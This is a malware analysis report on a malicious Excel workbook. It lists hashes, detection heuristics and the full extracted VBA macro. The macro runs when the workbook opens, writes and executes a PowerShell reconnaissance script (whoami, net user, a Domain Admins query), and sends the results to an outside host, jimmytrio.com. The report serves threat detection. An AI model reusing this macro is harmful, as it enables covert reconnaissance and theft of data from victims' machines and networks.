Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5941b012e370da0c…

MALICIOUS

Office (OOXML)

282.1 KB Created: 2019-07-07 22:54:40 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-24
MD5: 29f1b28a0187c6749eeb016e247d8fbf SHA-1: 3ccb94eaa56fe9f6a7133ba1e73cea612f84fa74 SHA-256: 5941b012e370da0cf32d12d7fad88e3f7d8b1c36829995be2b9477e99025d278
386 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel document containing a Workbook_Open VBA macro that executes a PowerShell command. This command downloads and executes a script from 'http://jimmytrio.com/c.aspx?d=' and writes output to a local file. The macro also attempts to open a URL using ShellExecute, which likely serves as a secondary C2 communication channel or payload delivery mechanism.

Heuristics 10

  • ClamAV: Xls.Dropper.Agent-8842889-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8842889-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    x = Shell("powershell.exe " & Environ("USERPROFILE") & "\Downloads\ZFELHHE.ps1 " & Environ("USERPROFILE") & "\Downloads\output.txt")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    x = Shell("powershell.exe " & Environ("USERPROFILE") & "\Downloads\ZFELHHE.ps1 " & Environ("USERPROFILE") & "\Downloads\output.txt")
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    x = Shell("powershell.exe " & Environ("USERPROFILE") & "\Downloads\ZFELHHE.ps1 " & Environ("USERPROFILE") & "\Downloads\output.txt")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    x = Shell("powershell.exe " & Environ("USERPROFILE") & "\Downloads\ZFELHHE.ps1 " & Environ("USERPROFILE") & "\Downloads\output.txt")
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://douglashvac.com Referenced by macro
    • http://jimmytrio.com/c.aspx?d=Referenced by macro
    • http://jimmytrio.com/c.aspx?dReferenced by macro
    • http://jimmytrio.com/c.aspx?d=$Referenced by macro
    • http://www.iec.chReferenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro
    • http://ns.adobe.com/tiff/1.0/Referenced by macro
    • https://google.comReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2541 bytes
SHA-256: 39f9fd0e9d6c318528a3d1965f9e6e7ac84b3263ad6b196eed5e155aa651404f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ShellExecute _
  Lib "shell32.dll" Alias "ShellExecuteA" ( _
  ByVal hWnd As Long, _
  ByVal Operation As String, _
  ByVal Filename As String, _
  Optional ByVal Parameters As String, _
  Optional ByVal Directory As String, _
  Optional ByVal WindowStyle As Long = vbMinimizedFocus _
  ) As Long

Private Sub Workbook_Open()

WriteScript
Application.Wait (Now + TimeValue("0:00:1"))
ExecuteScript
Application.Wait (Now + TimeValue("0:00:1"))
OpenUrl

End Sub

Private Sub ExecuteScript()

x = Shell("powershell.exe " & Environ("USERPROFILE") & "\Downloads\ZFELHHE.ps1 " & Environ("USERPROFILE") & "\Downloads\output.txt")

End Sub

Private Sub OpenUrl()

    Dim lSuccess As Long
    lSuccess = ShellExecute(0, "Open", "http://jimmytrio.com/c.aspx?d=" & GatherInfo() & "&r=https://google.com")

End Sub


Private Function GatherInfo()

Dim myFile As String
Dim myPath As String
Dim myContents As String
Dim textline As String

myPath = Environ("USERPROFILE") & "\Downloads\"
myFile = myPath & "output.txt"
myContents = ""

Open myFile For Input As #1

Do Until EOF(1)
    Line Input #1, textline
    myContents = myContents & textline
Loop

Close #1

GatherInfo = Replace(Replace(Replace(myContents, " ", ""), vbCrLf, "|"), "-", "")

End Function

Private Sub WriteScript()

Dim myFile As String
Dim myPath As String
Dim fileContents As String
fileContents = ""

fileContents = "$outfile = $args[0]" & vbCrLf
fileContents = fileContents & "Set-ExecutionPolicy Unrestricted -Force" & vbCrLf
fileContents = fileContents & "whoami > $outfile" & vbCrLf & "hostname >> $outfile" & vbCrLf & "net user >> $outfile" & vbCrLf & "net group ""Domain Admins"" /domain >> $outfile" & vbCrLf

myPath = Environ("USERPROFILE") & "\Downloads\"
myFile = myPath & "ZFELHHE.ps1"
Open myFile For Output As #1
Print #1, fileContents
Close #1

End Sub



Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 22016 bytes
SHA-256: e900c8be9d7e1fa377c0d914bcac537297d71aeff489217cd0b41b8ddb96a5d5
Detection
ClamAV: Xls.Dropper.Agent-8842889-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.